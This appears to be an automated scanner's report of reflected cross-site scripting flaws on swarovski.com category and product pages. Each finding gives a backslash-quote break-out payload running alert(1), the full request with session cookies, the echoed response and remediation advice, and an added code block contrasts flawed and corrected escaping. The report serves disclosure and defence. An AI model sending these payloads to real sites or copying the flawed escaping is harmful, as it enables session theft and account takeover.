Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.swarovski.com/Web_US/en/01/category/Jewellery.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/01/category/Jewellery.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d966\'%3balert(1)//2712df2315d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d966\\';alert(1)//2712df2315d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
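The escaping defect described above (a backslash is added before each quote, but backslashes already in the input are left alone) and the remediation that follows, as an added example written for this page rather than code from the report or the application; `escapeQuotesOnly`, `escapeForSingleQuotedJs`, `isSafelyContained` and `renderQueryFragment` are assumed names. It runs the flawed and the corrected escaping on the parameter name recorded in finding 1.1 and checks whether the result stays inside the quoted literal.

```javascript
// Added example (not from the report): why escaping only quotation marks
// fails, and how to escape user data for a single-quoted JavaScript string.

// Flawed escaping as the report describes it: a backslash is placed before
// each quotation mark, but backslashes in the input are not escaped.
function escapeQuotesOnly(input) {
  return input.replace(/'/g, "\\'");
}

// Corrected escaping: backslashes are doubled FIRST, so a backslash supplied
// in the input can no longer neutralise the one added before the quote.
// Line terminators and angle brackets are escaped as well, because they can
// also break out of a string literal or close the enclosing <script> block.
function escapeForSingleQuotedJs(input) {
  return input
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"')
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029")
    .replace(/</g, "\\x3c")
    .replace(/>/g, "\\x3e");
}

// Check whether an escaped value stays inside a single-quoted literal:
// walk the characters, skip escaped pairs, and fail on any bare quote.
function isSafelyContained(escaped) {
  let i = 0;
  while (i < escaped.length) {
    const c = escaped[i];
    if (c === "\\") { i += 2; continue; } // escape sequence: skip both chars
    if (c === "'") return false;          // bare quote terminates the string
    i += 1;
  }
  return true;
}

// Build the fragment the page emits: query: '<value>=1&...'
function renderQueryFragment(escapedValue) {
  return "query: '" + escapedValue + "=1&SetIncludeCookies=true'";
}

// Parameter name from finding 1.1 after URL decoding (%3b -> ';').
// JS source "\\'" is one backslash followed by a quote.
const PAYLOAD = "5d966\\';alert(1)//2712df2315d";

const flawed = escapeQuotesOnly(PAYLOAD);       // matches the report's echoed form
const fixed = escapeForSingleQuotedJs(PAYLOAD); // quote is still escaped

console.log(renderQueryFragment(flawed), isSafelyContained(flawed));
console.log(renderQueryFragment(fixed), isSafelyContained(fixed));
```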
Request
GET /Web_US/en/01/category/Jewellery.html?5d966\'%3balert(1)//2712df2315d=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '5d966\\';alert(1)//2712df2315d=1&CatalogCategoryName=01&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
li ...[SNIP]...
1.2. http://www.swarovski.com/Web_US/en/0112/category/Jewellery/Rings.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/0112/category/Jewellery/Rings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d54f\'%3balert(1)//827fd1d9704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d54f\\';alert(1)//827fd1d9704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/0112/category/Jewellery/Rings.html?3d54f\'%3balert(1)//827fd1d9704=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '3d54f\\';alert(1)//827fd1d9704=1&CatalogCategoryName=0112&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
...[SNIP]...
1.3. http://www.swarovski.com/Web_US/en/02/category/Fashion_Accessories.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/02/category/Fashion_Accessories.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaee8\'%3balert(1)//fc48743c5ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaee8\\';alert(1)//fc48743c5ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/02/category/Fashion_Accessories.html?aaee8\'%3balert(1)//fc48743c5ec=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: 'aaee8\\';alert(1)//fc48743c5ec=1&CatalogCategoryName=02&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
li ...[SNIP]...
1.4. http://www.swarovski.com/Web_US/en/03/category/Watches.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/03/category/Watches.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68fe7\'%3balert(1)//93893839f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68fe7\\';alert(1)//93893839f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/03/category/Watches.html?68fe7\'%3balert(1)//93893839f95=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '68fe7\\';alert(1)//93893839f95=1&CatalogCategoryName=03&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
li ...[SNIP]...
1.5. http://www.swarovski.com/Web_US/en/06/category/Home_Accessories.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/06/category/Home_Accessories.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19db5\'%3balert(1)//d9c80cd877e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19db5\\';alert(1)//d9c80cd877e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/06/category/Home_Accessories.html?19db5\'%3balert(1)//d9c80cd877e=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '19db5\\';alert(1)//d9c80cd877e=1&CatalogCategoryName=06&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
li ...[SNIP]...
1.6. http://www.swarovski.com/Web_US/en/07/category/Figurines.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/07/category/Figurines.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17808\'%3balert(1)//aa7283160eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17808\\';alert(1)//aa7283160eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/07/category/Figurines.html?17808\'%3balert(1)//aa7283160eb=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '17808\\';alert(1)//aa7283160eb=1&CatalogCategoryName=07&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
li ...[SNIP]...
1.7. http://www.swarovski.com/Web_US/en/08/category/Charms.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/08/category/Charms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39e0\'%3balert(1)//d033c11050f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e39e0\\';alert(1)//d033c11050f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/08/category/Charms.html?e39e0\'%3balert(1)//d033c11050f=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
1.8. http://www.swarovski.com/Web_US/en/1062669/product/Mila_Pierced_Earrings.html [name of an arbitrarily supplied request parameter]
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cd7\'%3balert(1)//a08a6f4ff1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8cd7\\';alert(1)//a08a6f4ff1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/1062669/product/Mila_Pierced_Earrings.html?a8cd7\'%3balert(1)//a08a6f4ff1b=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
1.9. http://www.swarovski.com/Web_US/en/91006/promotion/SCS_Member_Shopping.html [name of an arbitrarily supplied request parameter]
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17386\'%3balert(1)//82cb96eda6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17386\\';alert(1)//82cb96eda6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91006/promotion/SCS_Member_Shopping.html?17386\'%3balert(1)//82cb96eda6a=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect',
// optional: linkparams for every countryselection-call
linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: '17386\\';alert(1)//82cb96eda6a=1&CatalogCategoryName=91006&SetIncludeCookies=true'}
});
// if wishlist-functionality needed on page
config.set('wishlist', {
// optional: params for every type of wishlist-call
...[SNIP]...
1.10. http://www.swarovski.com/Web_US/en/91105/promotion/Unique_gifts.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/91105/promotion/Unique_gifts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd542\'%3balert(1)//031166322cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd542\\';alert(1)//031166322cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
